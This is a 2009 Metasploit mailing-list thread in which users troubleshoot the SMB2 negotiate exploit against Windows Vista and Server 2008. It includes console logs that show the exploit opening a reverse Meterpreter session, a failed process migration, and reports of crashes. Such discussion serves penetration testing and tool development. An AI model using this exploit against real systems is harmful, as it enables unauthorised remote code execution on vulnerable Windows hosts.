Metasploit 3.3 Development Updates

[skysbsb at gmail.com (David Gomes)]

I have tried against Windows Vista and sucessful exploit the vulnerability.
However, i can't migrate to another process, and i can't exploit this same
vulnerability twice.

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969)

meterpreter > ps

Process list
============
    3952  Explorer.EXE                 C:\Windows\Explorer.EXE
...

meterpreter > migrate 3952
[*] Migrating to 3952...


^C[-] Error while running command migrate:
meterpreter > ps
[-] Error running command ps: undefined method `write' for nil:NilClass
/pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in
`write'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in
`send_packet'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in
`send_packet_wait_response'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in
`send_request'/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in
`get_processes'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in
`cmd_ps'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in
`call'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in
`run'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'/pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in
`_interact'/pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in
`interact'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in
`cmd_sessions'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in
`cmd_exploit'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in
`run'./msfconsole:82
meterpreter > exit

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...

[*] Exploit completed, but no session was created.




On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento <
danilo.nascimento.c at gmail.com> wrote:

> I can't exploit VMs in VirtualBox against Windows Server 2008
> Enterprise/Standart (no updates) and Windows Vista Business en SP1 in
> a x86 Host and Guest SO. I've tried enable/disable the PAE/NX option
> but a BSOD ocurred when i run the exploit.
>
> Which VM Application are you using? When i have some free time i'll
> test in Vmware ESXi and XEN.
>
> This exploit works fine against physical machines (Vista SP1 and
> Windows Server 2008) for me, the problem is that i can't migrate to
> another process (Explorer.exe) and i can exploit only once.
>
> Danilo Nascimento
>
>
>
> On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:
> > On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:
> > > Unfortunately I tried it against a Vista Sp2 Enterprise and exploit
> > > failed while on a Vista SP2 Ultimate I ended up with a BSOD.
> > > Any idea where I should look into?
> >
> > Were seeing reports of it failing about 50/50 with physical machines and
> > working almost always with VMs - either way we need to dig into it and
> > do a little more work. Thanks for the feedback!
> >
> > -HD
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework



-- 
David Gomes Guimar?es,
Graduando em Ci?ncia da Computa??o - UFG,
Estagi?rio da ?rea de redes - CERCOMP/UFG.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090929/cdf9f5f4/attachment-0001.html>